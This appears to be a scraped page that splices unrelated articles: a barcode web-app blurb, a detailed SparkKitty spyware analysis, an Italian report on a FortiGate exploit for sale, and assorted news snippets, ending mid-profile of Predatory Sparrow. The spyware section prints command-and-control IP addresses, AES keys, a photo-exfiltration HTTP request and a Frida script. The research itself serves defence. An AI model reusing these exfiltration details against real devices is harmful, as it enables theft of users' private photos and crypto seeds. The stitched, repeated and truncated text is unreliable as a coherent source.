QR codes are something that we all take for granted in this day and age. There are even a million apps to create your own QR codes, but what if you want to make a barcode? How about making a specific kind of barcode that follows UPC-E, CODE 39, or even the infamous… CODABAR? Well, it might be more difficult to find a single app that can handle all those different standards. Using “yet-another-web-app”, Barcode Tool – Generator & Scanner, you can rid these worries, created by [Ricardo de Azambuja].
When going to [Ricardo]’s simple application, you will find a straightforward interface that allows you to make far more different strips and square patterns than you’ve ever imagined. Of course, starting with the common QR code, you can create custom overlaid codes like many other QR generators. More uniquely, there are options for any barcode under the sun to help organize your hacker workspace. If you don’t want to download an app to scan the codes, you can even use the included scanner function.
If you want to use the web app, you can find it here! In-depth solutions to rather simple problems are something we strive to provide here at Hackaday, and this project is no exception. However, if you want something more physical, check out this specialized outdoor city cooking station.
In January 2025, we uncovered the SparkCat spyware campaign, which was aimed at gaining access to victims’ crypto wallets. The threat actor distributed apps containing a malicious SDK/framework. This component would wait for a user to open a specific screen (typically a support chat), then request access to the device’s gallery. It would then use an OCR model to select and exfiltrate images of interest. Although SparkCat was capable of searching for any text within images, that campaign specifically targeted photos containing seed phrases for crypto wallets. The malware was distributed through unofficial sources as well as Google Play and App Store. Now, we’ve once again come across a new type of spyware that has managed to infiltrate the official app stores. We believe it is connected to SparkCat and also targets the cryptocurrency assets of its victims.
Here are the key facts about this new threat:
The malware targets both iOS and Android devices, and it is spreading in the wild as well as through the App Store and Google Play.
On iOS, the malicious payload is delivered as frameworks (primarily mimicking AFNetworking.framework or Alamofire.framework) or obfuscated libraries disguised as libswiftDarwin.dylib, or it can be embedded directly into the app itself.
The Android-specific Trojan comes in both Java and Kotlin flavors; the Kotlin version is a malicious Xposed module.
While most versions of this malware indiscriminately steal all images, we discovered a related malicious activity cluster that uses OCR to pick specific pictures.
The campaign has been active since at least February 2024.
It all began with a suspicious online store…
During routine monitoring of suspicious links, we stumbled upon several similar-looking pages that were distributing TikTok mods for Android. In these modified versions, the app’s main activities would trigger additional code. The code would then request a Base64-encoded configuration file from hxxps://moabc[.]vip/?dev=az. A sample decoded configuration file is shown below. { "links": { "shopCenter": "https://h1997.tiktokapp.club/wap/?", "goodsList": "https://h1997.tiktokapp.club/www/?", "orderList": "https://h1997.tiktokapp.club/www/?", "reg": "https://www.baidu.com", "footbar": "https://www.baidu.com" } } The links from the configuration file were displayed as buttons within the app. Tapping these opened WebView, revealing an online store named TikToki Mall that accepted cryptocurrency as payment for consumer goods. Unfortunately, we couldn’t verify if it was a legitimate store, as users had to register with an invitation code to make a purchase.
Although we didn’t find any other suspicious functionality within the apps, a gut feeling told us to dig deeper. We decided to examine the code of the web pages distributing the apps, only to find a number of interesting details suggesting they might also be pushing iOS apps. <div class="t-name"> <div class="tit"> {{if ext=="ipa"}} <i class="iconfont icon-iphone" style="font-size:inherit;margin-right:5px"></i> {{else}} <i class="iconfont icon-android" style="font-size:inherit;margin-right:5px"></i> {{/if}}
iOS app delivery method
And sure enough, visiting the website on an iPhone triggers a series of redirects, ultimately landing the user on a page that crudely mimics the App Store and prompts them to download an app.
iOS app download page
As you know, iOS doesn’t just let you download and run any app from a third-party source. However, Apple provides members of the Apple Developer Program with so-called provisioning profiles. These allow a developer certificate to be installed on a user device. iOS then uses this certificate to verify the app’s digital signature and determine if it can be launched. Besides the certificate, a provisioning profile contains its expiration date and the permissions to be granted to the app, as well as other information about the developer and the app. Once the profile is installed on a device, the certificate becomes trusted, allowing the app to run.
Provisioning profiles come in several types. Development profiles are used for testing apps and can only be distributed to a predefined set of devices. App Store Connect profiles allow for publishing an app to the App Store. Enterprise profiles were created to allow organizations to develop internal-use apps and install them on their employees’ devices without publishing them on the App Store and without any restrictions on which devices they can be installed on. Although the Apple Developer Program requires a paid membership and developer verification by Apple, Enterprise profiles are often exploited. They are used not only by developers of apps unsuitable for the App Store (online casinos, cracks, cheats, or illegal mods of popular apps) but also by malware creators. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>AppIDName</key> <string>rdcUniApp</string> <key>ApplicationIdentifierPrefix</key> <array> <string>EHQ3N2D5WH</string> </array> <key>CreationDate</key> <date>2025-01-20T06:59:55Z</date> <key>Platform</key> <array> <string>iOS</string> <string>xrOS</string> <string>visionOS</string> </array> <key>IsXcodeManaged</key> <false/> <key>DeveloperCertificates</key> <array> <data>OMITTED</data> </array>
Example of a provisioning profile installed to run a malicious TikTok mod In the case of the malicious TikTok mods, the attackers used an Enterprise profile, as indicated by the following key in its body: <key>ProvisionsAllDevices</key> <true/> It’s worth noting that installing any provisioning profile requires direct user interaction, which looks like this:
Profile installation flow
Looking for copper, found gold
Just like its Android counterpart, the installed iOS app contained a library that embedded links to a suspicious store within the user’s profile window. Tapping these opened them in WebView.
Suspicious store opened inside a TikTok app
It seemed like a straightforward case: another mod of a popular app trying to make some money. However, one strange detail in the iOS version caught our attention. On every launch, the app requested access to the user’s photo gallery – highly unusual behavior for the original TikTok. Furthermore, the library containing the store didn’t have code accessing the photo gallery, and the Android version never requested image permissions. We were compelled to dig a little deeper and examine the app’s other dependencies. This led to the discovery of a malicious module pretending to be AFNetworking.framework. For a touch of foreshadowing, let’s spotlight a curious detail: certain apps referred to it as Alamofire.framework, but the code itself stayed exactly the same. The original version of AFNetworking is an open-source library that provides developers with a set of interfaces for convenient network operations.
The malicious version differs from the original by a modified AFImageDownloader class and an added AFImageDownloaderTool class. Interestingly, the authors didn’t create separate initialization functions or alter the library’s exported symbols to launch the malicious payload. Instead, they took advantage of a feature in Objective-C that allows classes to define a special load selector, which is automatically called when the app is loading. In this case, the entry point for the malicious payload was the +[AFImageDownloader load] selector, which does not exist in the original framework.
Malicious class entry point
The malicious payload functions as follows:
It checks if the value of the ccool key in the app’s main Info.plist configuration file matches the string 77e1a4d360e17fdbc. If the two differ, the malicious payload will not proceed.
It retrieves the Base64-encoded value of the ccc key from the framework’s Info.plist file. This value is decoded and then decrypted using AES-256 in ECB mode with the key p0^tWut=pswHL-x>>:m?^.^)W padded with nulls to reach a length of 32 bytes. Some samples were also observed using the key J9^tMnt=ptfHL-x>>:m!^.^)A. If there’s no ccc key in the configuration or the key’s value is empty, the malware attempts to use the key com.tt.cf to retrieve an encrypted string from UserDefaults – a database where the app can store information for use in subsequent launches.
The decrypted value is a list of URLs from which the malware fetches additional payloads, encrypted using the same method. This new ciphertext contains a set of C2 addresses used for exfiltrating stolen photos.
The final step before uploading the photos is to receive authorization from the C2 server. To do this, the malware sends a GET request to the /api/getImageStatus endpoint, transmitting app details and the user’s UUID. The server responds with the following JSON:{"msg":"success","code":0,"status":"1"}The code field tells the app whether to repeat the request after a delay, with 0 meaning no, and the status field indicates whether it has permission to upload the photos.
Next, the malware requests access to the user’s photo gallery. It then registers a callback function to monitor for any changes within the gallery. The malware exfiltrates any accessible photos that have not already been uploaded. To keep track of which photos have been stolen, it creates a local database. If the gallery is modified while the app is running, the malware will attempt to access and upload the new images to the C2 server.
Photo exfiltration and upload
Data transmission is performed directly within the selector [AFImageDownloader receiptID:andPicID:] by making a PUT request to the /api/putImages endpoint. In addition to the image itself, information about the app and the device, along with unique user identifiers, is also sent to the server. PUT /api/putImages HTTP/1.1 Host: 23.249.28.88:7777 Content-Type: multipart/form-data; boundary=Boundary+C9D8BE3781515E01 Connection: keep-alive Accept: */* User-Agent: TikTok/31.4.0 (iPhone; iOS 14.8; Scale/3.00) Accept-Language: en-US;q=1, ja-US;q=0.9, ar-US;q=0.8, ru-US;q=0.7 Content-Length: 80089 Accept-Encoding: gzip, deflate --Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name="appname" TikTok --Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name="buid" com.zhiliaoapp.musically --Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name="device" ios --Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name="userId" xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx --Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name="uuid" xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/Lx/xxx --Boundary+C9D8BE3781515E01 Content-Disposition: form-data; name="image"; filename="<name>" Content-Type: image/jpeg ......JFIF.....H.H.....LExif..MM.*...................i.........&.................e.......... ........8Photoshop 3.0.8BIM........8BIM.%................ ...B~...4ICC_PROFILE......$appl....mntrRGB XYZ .......
Digging deeper
When we found a spyware component in the modified iOS version of TikTok, we immediately wondered if the Trojan had an Android counterpart. Our initial search led us to a bunch of cryptocurrency apps. These apps had malicious code embedded in their entry points. It requests a configuration file with C2 addresses and then decrypts it using AES-256 in ECB mode. These decrypted addresses are then used by the Trojan to send a GET request to /api/anheartbeat. The request includes information about the infected app. The Trojan expects a JSON response. If the code field is 0, it means communication with that C2 is allowed. The status flag in the JSON determines whether the Trojan can send the victim’s images to the server.
Checking C2 addresses
The main functionality of this malware – stealing images from the gallery – works in two stages. First, the malware checks the status flag. If it’s set to allow file uploads, the Trojan then checks the contents of a file named aray/cache/devices/.DEVICES on external storage. The first time it runs, the Trojan writes a hexadecimal number to this file. The number is an MD5 hash of a string containing the infected device’s IMEI, MAC address, and a random UUID. The content of this file is then compared to the string B0B5C3215E6D. If the content is different, the Trojan uploads images from the gallery, along with infected device info, to the command server via a PUT request to /api/putDataInfo. If the content is the same, it only uploads the third image from the end of an alphabetically sorted list. It’s highly likely the attackers use this specific functionality for debugging their malicious code.
Uploading image and device information
Later, we discovered other versions of this Trojan embedded in casino apps. These were loaded using the LSPosed framework, which is designed for app code hooking. Essentially, these Trojan versions acted as malicious Xposed modules. They would hook app entry points and execute code similar to the malware we described earlier, but with a few interesting twists:
The C2 address storage was located in both the module’s resources and directly within the malware code. Typically, these were two different addresses, and both were used to obtain C2 information.
Procedure for obtaining C2 addresses
Among the decrypted C2 addresses, the Trojan picks the one corresponding to the fastest server. It does this by sending a request to each server sequentially. If the request is successful, it records the response time. The shortest time then determines which C2 server is used. Note that this algorithm could have been implemented without needing to store intermediate values.
Finding the shortest response time
The code uses custom names for classes, methods, and fields.
It is written in Kotlin. Other versions we found were written in Java.
Spyware in official app stores
One of the Android Java apps containing a malicious payload was a messaging app with crypto exchange features. This app was uploaded to Google Play and installed over 10,000 times. It was still available in the store at the time of this research. We notified Google about it.
Infected app on Google Play
Another infected Android app we discovered is named 币coin and distributed through unofficial sources. However, it also has an iOS version. We found it on the App Store and alerted Apple to the presence of the infected app in their store.
Infected app page on the App Store
In both the Android and iOS versions, the malicious payload was part of the app itself, not of a third-party SDK or framework. In the iOS version, the central AppDelegate class, which manages the app’s lifecycle, registers its selector [AppDelegate requestSuccess:] as a handler for responses returned by requests sent to i.bicoin[.]com[.]cn.
Checking the server response and sending a photo
{ code = 0; data = { 27 = ( ); 50002 = ( { appVersion = ""; cTime = 1696304011000; id = 491; imgSubTitle = ""; imgTitle = "\U70ed\U5f00\U5173\Uff08\U65b0\Uff09"; imgType = 50002; imgUrl = 0; imgUrlSub = ""; isFullScreen = 0; isNeed = 1; isSkip = 1; langType = all; operator = 0; skipUrl = ""; sort = 10000; source = 0; type = 0; uTime = <timestamp>; } ); }; dialog = { cancelAndClose = 0; cancelBtn = ""; cancelColor = ""; code = 0; confirmBtn = ""; confirmColor = ""; content = ""; contentColor = ""; time = ""; title = OK; titleColor = ""; type = 3; url = ""; };Sample server response In the response, the imgUrl field contains information about the permission to send photos (1 means granted). Once the Trojan gets the green light, it uses a similar method to what we described earlier: it downloads an encrypted set of C2 addresses and tries sending the images to one of them. By default, it’ll hit the first address on the list. If that one’s down, the malware just moves on to the next. The photo-sending functionality is implemented within the KYDeviceActionManager class.
Retrieving and sending photos
Suspicious libcrypto.dylib mod
During our investigation, we also stumbled upon samples that contained another suspicious library: a modified version of OpenSSL’s cryptographic primitives library, libcrypto.dylib. It showed up under names like wc.dylib and libswiftDarwin.dylib, had initialization functions that were obfuscated with LLVM, and contained a link to a configuration we’d seen before in other malicious frameworks. It also imported the PHPhotoLibrary class, used for gallery access in the files we mentioned earlier. Sometimes the library was delivered alongside the malicious AFNetworking.framework/Alamofire.framework, sometimes not.
Unlike other variants of this malware, this particular library didn’t actually reach out to the malicious configuration file link embedded within it. That meant we had to manually dig for the code responsible for its initial communication with the C2. Even though these library samples are heavily obfuscated, some of them, like the sample with the hash c5be3ae482d25c6537e08c888a742832, still had cross-references to the part of the code where the encrypted configuration page URL was used. This function converted a URL string into an NSString object.
Section of obfuscated code for loading the malicious URL
Using Frida, we can execute any piece of code as a function, but simply converting a string to an NSString object isn’t enough to confirm the library’s malicious intent. So, we followed the cross-references up several levels. When we tried to execute the function that worked with the URL during its execution, we discovered it was making a GET request to the malicious URL. However, we couldn’t get a response right away; the server the URL pointed to was already inactive. To make the function run correctly, we used Frida to substitute the link with a working one, where we knew exactly what data it returned and how it was decrypted. By setting logging hooks on the objc_msgSend call and running the malicious function with a swapped URL, we got the info we needed about the calls. Below is the Frida script we used to do this: function traceModule(impl, name) { console.log("Tracing " + name, impl); var exit_log = 0; Interceptor.attach(impl, { onEnter: function(args) { var bt = Thread.backtrace(this.context, Backtracer.ACCURATE); if (!moduleMap) { moduleMap = new ModuleMap(); } var modules = bt.map(x => moduleMap.find(x)).filter(x => x != null).map(x => x.name); // we want to trace only calls originating from malware dylib if (modules.filter(x => x.includes('wc.dylib')).length > 0) { exit_log = 1; console.warn("\n*** entering " + name); if(name.includes('objc_msgSend')) { var sel = this.context.x1.readUtf8String(); if (sel.includes("stringWithCString:")) { var s = this.context.x2.readUtf8String(); if (s.includes('.cn-bj.ufileos.com')) { console.log("Replacing URL: ", s); var news = Memory.allocUtf8String('https://data-sdk2.oss-accelerate.aliyuncs.com/file/SGTMnH951121'); this.context.x2 = news; console.log("New URL: ", this.context.x2.readUtf8String()); } else console.log(s); } }
var malInited = false; var malFunc; function callMalware() { if (!malInited) { malFunc = new NativeFunction(base.add(0x7A77CC), 'void', []); traceModule(base.add(0x821360), 'objc_msgSend'); malInited = true; } malFunc(); }
var mname = "wc.dylib"; var base = Process.enumerateModules().filter(x=>x.name.includes(mname))[0].base; console.log('Base address: ', base); malFunc(); Our suspicions were confirmed: the malicious function indeed loads and decrypts the C2 address configuration from a given URL. It then uses this C2 for sending device data, following the same pattern we described earlier and using the same AES-256 key. Below is an excerpt from the function’s execution logs. *** entering objc_msgSend ### Creating NSString object with decrypted string [ 0x20193a010 stringWithCString:"http://84.17.37.155:8081" encoding: ] 0x102781be8 wc.dylib!0x7d1be8 (0x7d1be8) 0x1027590e8 wc.dylib!0x7a90e8 (0x7a90e8)
*** entering objc_msgSend ### Creating NSString with api endpoint decrypted somewhere in code [ 0x20193a010 stringWithCString:"%@/api/getStatus?buid=%@&appname=%@&userId=%@" encoding: ] 0x10277cc50 wc.dylib!0x7ccc50 (0x7ccc50) 0x102783264 wc.dylib!0x7d3264 (0x7d3264)
### Here sample initiates HTTP request to decrypted C2 address and decrypts its response ###
*** entering objc_msgSend ### Getting server response as data object [ 0x2022d5078 initWithData:encoding: ] 0x10277f4a4 wc.dylib!0x7cf4a4 (0x7cf4a4) 0x1afafcac4 CFNetwork!0x1dac4 (0x180a6cac4)
*** leaving objc_msgSend ### Server response in bytes
00000000 41 e9 92 01 a2 21 00 00 8c 07 00 00 01 00 00 00 A....!.......... 00000010 2e 7b 22 6d 73 67 22 3a 22 73 75 63 63 65 73 73 .{"msg":"success 00000020 22 2c 22 63 6f 64 65 22 3a 30 2c 22 75 73 22 3a ","code":0,"us": 00000030 31 2c 22 73 74 61 74 75 73 22 3a 22 30 22 7d 00 1,"status":"0"}. The function execution log above clearly shows it uses an IP address from the encrypted configuration file. Device data is sent to this IP’s /api/getStatus endpoint with arguments familiar from previous samples. We also see that the server’s response contains the code and status fields we’ve encountered before. All of this strongly suggests that this library is also involved in stealing user photos. The only thing we haven’t pinpointed yet is the exact conditions under which this malicious function activates. At startup, the library contacts a C2 whose address in encrypted within it, sending device information and expecting a JSON string response from the server. At the time of this research, we hadn’t found any samples with an active C2 address, so we don’t know the precise response it’s looking for. However, we assume that response – or subsequent responses – should contain the permission to start sending photos.
Another activity cluster?
During our research, we stumbled upon a significant number of pages offering for download various scam iOS apps in the PWA (progressive web app) format. At first glance, these pages seemed unrelated to the campaign we describe in this article. However, their code bore a striking resemblance to the pages distributing the malicious TikTok version, which prompted us to investigate how users were landing on them. While digging into the traffic sources, we uncovered ads for various scams and Ponzi schemes on popular platforms.
Scam platform account on YouTube
Some of these PWA-containing pages also included a section prompting users to download a mobile app. For Android users, the link downloaded an APK file that opened the scam platform via WebView.
App download links
Beyond just opening scam websites in WebView, these downloaded APKs had another function. The apps requested access to read storage. Once this was granted, they used the Loader API to register their content download event handler. This handler then selected all JPEG and PNG images. The images were processed using the Google ML Kit library designed for optical character recognition. ML Kit searched for text blocks and then broke them down into lines. If at least three lines containing a word with a minimum of three letters were found, the Trojan would send the image to the attackers’ server – its address was retrieved from Amazon AWS storage.
Code snippet for photo uploads
We’re moderately confident that this activity cluster is connected to the one described above. Here’s why:
The malicious apps also focus on cryptocurrency themes.
Similar tactics are employed: the C2 address is also hosted in cloud storage, and gallery content is exfiltrated.
The pages distributing iOS PWAs look similar to those used to download malicious TikTok mods.
Given this connection between the two activity clusters, we suspect the creators of the apps mentioned earlier might also be spreading them through social media ads.
Campaign goals and targets
Unlike SparkCat, the spyware we analyzed above doesn’t show direct signs of the attackers being interested in victims’ crypto assets. However, we still believe they’re stealing photos with that exact goal in mind. The following details lead us to these conclusions:
A crypto-only store was embedded within the TikTok app alongside the spyware.
Among the apps where the spyware was found, several were crypto-themed. For instance, 币coin in the App Store positions itself as a crypto information tracker, and the SOEX messaging app has various crypto-related features as well.
The main source for distributing the spyware is a network of cookie-cutter app download platforms. During our investigation, we found a significant number of domains that distributed both the described Trojan and PWAs (progressive web apps). Users were directed to these PWAs from various cryptocurrency scam and Ponzi scheme sites.
Our data suggests that the attackers primarily targeted users in Southeast Asia and China. Most of the infected apps we discovered were various Chinese gambling games, TikTok, and adult games. All these apps were originally aimed specifically at users in the regions mentioned above. Furthermore, we believe this malware is linked to the SparkCat campaign, and here’s our reasoning:
Some Android apps infected with SparkKitty were built with the same framework as the apps infected with SparkCat.
In both campaigns, we found the same infected Android apps.
Within the malicious iOS frameworks, we found debug symbols. They included file paths from the attackers’ systems, which pointed to where their projects were being built. These paths match what we previously observed in SparkCat.
Takeaways
Threat actors are still actively compromising official app stores, and not just for Android – iOS is also a target. The espionage campaign we uncovered uses various distribution methods: it spreads through apps infected with malicious frameworks/SDKs from unofficial sources, as well as through malicious apps directly on the App Store and Google Play. While not technically or conceptually complex, this campaign has been ongoing since at least the beginning of 2024 and poses a significant threat to users. Unlike the previously discovered SparkCat spyware, this malware isn’t picky about which photos it steals from the gallery. Although we suspect the attackers’ main goal is to find screenshots of crypto wallet seed phrases, other sensitive data could also be present in the stolen images.
Judging by the distribution sources, this spyware primarily targets users in Southeast Asia and China. However, it doesn’t have any technical limitations that would prevent it from attacking users in other regions.
Our security products return the following verdicts when detecting malware associated with this campaign:
Un nuovo e allarmante sviluppo sta scuotendo il panorama della sicurezza informatica: un attore malevolo ha pubblicizzato sul dark webun exploit altamente sofisticato volto a compromettere dispositivi FortiGate.
Si tratta di un nuovo exploit venduto al prezzo di 12.000 dollari per firewall FortiGate che è apparso in vendita sul noto forum underground Exploit. Il post, pubblicato da un utente con lo pseudonimo Anon-WMG, presenta uno strumento capace di compromettere in modo massivo dispositivi Fortinet sfruttando le API esposte.
Caratteristiche tecniche dell’exploit
Denominato “FortiGate API Dump Exploit (~7.2 e versioni inferiori)”, il tool è in grado di interagire con oltre 170 endpoint delle API FortiGate, con compatibilità dichiarata per le versioni 6.x e 5.x, e testato anche su 7.2.6 e precedenti. Le funzionalità includono:
Dump automatico da più di 170 endpoint API Fortinet
Estrazione di informazioni sensibili: configurazioni firewall, utenti VPN locali, portali SSL, backup, chiavi SNMP, parametri DNS, HA e NTP
Supporto al multithreading (oltre 20 thread) per scansioni rapide e massicce
Output in formato JSON e file di configurazione strutturati
Headers stealth e modulo di reporting dedicato (“Report Runner”)
Lo strumento prende di mira:
Firewall FortiGate con API esposte (porte predefinite: 443 e 10443)
L’autore sostiene che l’exploit sia in grado di compromettere:
Credenziali di rete interne e amministrative (inclusi hash e password cifrate)
Token attivi SAML/RADIUS/LDAP
Token VPN e ID di sessioni IPSec
Backup completi di configurazione dei dispositivi
Impatto e diffusione e prezzo di vendita
Le implicazioni sono gravi e includono:
Accesso alla rete interna e lateral movement
Furto di configurazioni, backup e credenziali
Compromissione di comunicazioni VPN in corso
Possibilità di escalation attraverso token utente legittimi
Il tool risulta testato su numerose versioni di FortiOS: v6.0.9, 6.2.5, 7.0.4, 7.2.1, 7.2.6, 6.2.x e altre.
Prezzo richiesto: 12.000 dollari
Pagamento in criptovaluta
Trattativa tramite escrow per garantire (almeno formalmente) la transazione
Forniti alcuni sample tramite link temporaneo su “send.exploit.in”
L’autore avverte di contattarlo solo in caso di reale intenzione d’acquisto
Contromisure e raccomandazioni
Le organizzazioni che utilizzano FortiGate devono agire immediatamente, soprattutto se:
Le interfacce API sono esposte direttamente su Internet
I dispositivi eseguono versioni obsolete del firmware
I portali VPN/SSL non sono configurati correttamente
Raccomandazioni operative:
Eseguire un audit immediato delle interfacce esposte
Aggiornare tutti i dispositivi alla versione FortiOS più recente e supportata
Limitare l’accesso alle API solo a indirizzi IP interni o autorizzati
Abilitare i log API per individuare attività sospette
Revocare e rigenerare i token VPN attivi, verificando l’integrità delle configurazioni
Conclusioni
La disponibilità di un exploit automatizzato come questo sul mercato underground evidenzia una volta di più quanto sia critico esporre anche solo parzialmente interfacce di gestione non adeguatamente protette. In questo caso, l’accesso non autenticato alle API FortiGate può portare al completo compromesso di una rete.
Canonical is sunsetting Bazaar version control on Launchpad in 2025. Learn about the timeline, migration options, and what it means for Ubuntu development.
#NoiSiamoLeScuole, questa settimana è dedicato all’IC “De Sanctis-Truzzi” di Genzano di Roma (RM), all’IC “Via Casalotti 259” di Roma e all’IC “Luigi Pirandello” di Fonte Nuova (RM) che, con i fondi per la Scuola 4.
#NoiSiamoLeScuole, questa settimana è dedicato all’IC “De Sanctis-Truzzi” di Genzano di Roma (RM), all’IC “Via Casalotti 259” di Roma e all’IC “Luigi Pirandello” di Fonte Nuova (RM) che, con i fondi per la Scuola 4.
Oggi, 23 giugno 2025, esce “Byte The Silence”, il nuovo fumetto sul cyberbullismo realizzato da Red Hot Cyber, è disponibile da oggi gratuitamente in formato elettronico, sulla nostra piattaforma di Academy. Si tratta delquarto episodio della collana a fumetti firmata BETTI‑RHC, pensata per raccontare in maniera accessibile, potente e visiva i pericoli delle minacce digitali, in particolare per i più giovani.
“Byte The Silence” è molto più di una semplice lettura: è un’esperienza narrativa profonda, costruita su oltre 60 tavole illustrate che raccontano con sensibilità e impatto la storia di una vittima di cyberbullismo. Il titolo – un gioco di parole tra “Byte”, unità di misura digitale, e “Break the Silence” – invita a rompere il muro del silenzio che spesso circonda chi subisce abusi online. Il fumetto nasce per essere uno strumento educativo, ma anche un modo per dare voce a chi troppo spesso viene zittito dal peso della vergogna o della paura.
Perché come riporta Massimiliano Brolli, fondatore di Red Hot Cyber, “Non possiamo dimenticarci di Carolina Picchio, 14 anni, suicidatasi dopo la diffusione di un video umiliante online. Michele Ruffino, 17 anni, che ha scritto una lettera straziante prima di togliersi la vita, stanco delle continue offese ricevute anche via social. Alessandro di Gragnano che ha deciso di togliersi la vita a 13 anni lanciandosi dal balcone, circondato da chat minacciose e prese in giro. Oppure il 15enne suicida di Sinigallia o il 13enne suicida di Palermo oltre a molti e molti casi stranieri.” Il progetto è stato curato dal team Arte di Red Hot Cyber, con la sceneggiatura diAndrea Gioia Lomoro e i disegni di Andrea Canolintas e i messaggi di Awareness di Daniela Farina. Tutti gli autori hanno saputo fondere con efficacia narrativa e impatto visivo, dando vita ad una storia dove vengono raccontate emozioni autentiche e situazioni purtroppo comuni a tanti adolescenti. Il fumetto tocca temi come l’esclusione sociale, le chat discriminatorie, il peso del giudizio online e le conseguenze psicologiche del bullismo digitale.
Un messaggio forte: un like ferisce, una risata uccide e il silenzio può distruggere
“Byte The Silence” è un richiamo a tutti gli adulti e gli educatori a prendersi carico della protezione delle nuove generazioni. “Il cyberbullismo è uno dei fenomeni più gravi e subdoli dell’era digitale. Può causare danni psicologici devastanti, spesso irreparabili. Con questo progetto vogliamo dire basta all’indifferenza. È nostro dovere dare strumenti concreti e gratuiti a chi vuole fare la differenza”.
Scarica gratuitamente Byte The Silence, il fumetto gratuito sul cyberbullismo realizzato da Red Hot Cyber accedendo alla nostra Academy. Il fumetto è pensato per un pubblico ampio: dagli studenti delle scuole medie e superiori, ai genitori, agli insegnanti, agli educatori e operatori sociali senza dimenticarsi dei bulli stessi. Red Hot Cyber incoraggia la diffusione del fumetto, proponendolo come strumento formativo nei percorsi di educazione digitale e cyber security awareness. La possibilità di scaricarlo gratuitamente in formato PDF vuole abbattere qualsiasi barriera all’accesso, perché la prevenzione e la sensibilizzazione devono essere un diritto per tutti.
“Byte The Silence” ci ricorda che ogni click, ogni parola, ogni silenzio conta.
E che un semplice fumetto può accendere una coscienza, cambiare uno sguardo o salvare una vita.
Da oggi, chiunque può contribuire a diffondere questo messaggio. Basta un download. Basta un gesto.
Perché un like può ferire. Una risata può uccidere. E il silenzio può distruggere.
The European Commission’s new legislative proposal for a deportation regulation fuels detention, criminalisation, and digital surveillance. The #ProtectNotSurveil coalition is demanding the end of the deportation regime and for the Commission to withdraw its proposal.
@Notizie dall'Italia e dal mondo Il sottomarino "USS Georgia" da cui sono stati lanciati i missili che hanno colpito i siti nucleari iraniani di Natanz e Esfahan, si era addestrato il 17 luglio 2024 nelle acque del Mediterraneo centrale L'articolo L’Italiahttps://pagineesteri.it/2025/06/23/medioriente/litalia-e-la-guerra-usa-israele-contro-liran/
@Notizie dall'Italia e dal mondo Pechino ha le mani legate per ora, perché deve dare priorità al negoziato sul commercio con Washington. La corrispondenza da Shanghai di Michelangelo Cocco L'articolo PODCAST. L’attacco Usa all’Iran spazza via l’iniziativa diplomatica cinese proviene da Pagine
Diversamente da quanto annunciato circa i tempi della sua decisione, Trump ha fatto sferrare un attacco aereo ai siti iraniani di Fordow e di Natantz, dove erano situati i laboratori per l’arricchimento dell’uranio, regolarmente ispezionati dalla Aie…
È arrivato il momento di sospendere Israele dalle Nazioni Unite. Qualcuno può pensare che sia science fiction, ma la richiesta all’Assemblea generale dell’Onu è arrivata l’anno scorso dal relatore speciale per il diritto al cibo, Michael Fawkri, con …
Il 17 giugno 2025 un attacco informatico ha paralizzato Bank Sepah, una delle principali istituzioni finanziarie dell’Iran.
L’attacco è stato rivendicato dal gruppo Predatory Sparrow, già noto per le sue operazioni distruttive contro infrastrutture critiche iraniane. Nel presente documento vi è un’analisi approfondita del Threat Actor Predatory Sparrow, delle sue capacità tecniche e degli obiettivi dichiarati, con particolare attenzione al contesto geopolitico e all’uso di malware proprietari.
Autori:
Cyber Defence Center Maticmind
Cyber Competence Center Maticmind
Andrea Mariucci | Head of Cyber Defence Center @Maticmind
Ada Spinelli | Cyber Threat Intelligence Analyst @Maticmind
SCHEDA THREAT ACTOR: PREDATORY SPARROW
Nome Principale: Predatory Sparrow Nomi Alternativi: – Gonjeshke Darande (گنجشک درنده – traduzione in farsi) – Indra (overlap parziale, similitudini nel codice dei malware utilizzati) Classificazione: Gruppo hacktivista pro-israeliano Primo Avvistamento: 2021 Stato Attuale: Attivo (ultima attività documentata: giugno 2025)
IDENTITÀ E AFFILIAZIONI
Predatory Sparrow si presenta come un gruppo di hacktivisti autoproclamato, ma la sua sofisticazione tecnica e le capacità operative suggeriscono un probabile coinvolgimento governativo o militare. Secondo un articolo di WIRED, fonti della difesa statunitense hanno riferito al New York Times che il gruppo era collegato a Israele.
Il gruppo, nato nel 2021, è entrato in stato di quiescenza tra il 2022 e l’ottobre 2023, tornando operativo all’avvio delle ostilità nella striscia di Gaza.
Diamond Model
Motivazioni e Obiettivi
Obiettivo Primario: Condurre attacchi distruttivi contro l’Iran, allo scopo di infliggere danni paragonabili a quelli di attacchi convenzionali, con effetti nella sfera psicologica, per indebolire la fiducia della popolazione nel regime degli Ayatollah e la tenuta di questo, in un quadro di operazioni PSYOPS, campagne di disinformazione e azioni di sabotaggio, causando al contempo conseguenze economiche significative alle aziende iraniane connesse con il governo o con l’esercito.
Motivazione Geopolitica: Si inserisce all’interno del confronto tra Israele, Iran e i proxy di quest’ultimo, allo scopo di rispondere agli attacchi condotti dalla Repubblica islamica direttamente o tramite proxy.
Valenza strategica: affermare la capacità offensiva dell’attore nel colpire asset industriali e digitali critici in territorio iraniano, con l’obiettivo di esercitare pressione e destabilizzazione mirata.
Tattiche di rivendicazione e propaganda
Utilizza canali X e Telegram per rivendicare gli attacchi
Pubblica video come prova degli attacchi riusciti, come nel caso del video dell’attacco distruttivo all’acciaieria iraniana
Include messaggi provocatori con riferimenti al Leader Supremo Iraniano
Si presenta talvolta come gruppo hacktivisti Iraniano per confondere l’attribuzione
Apparentemente, il gruppo conduce attacchi con il criterio dichiarato di non mettere a repentaglio vite innocenti (come riportato sul canale Telegram del TA e riportato da BBC)
CAPACITÀ TECNICHE
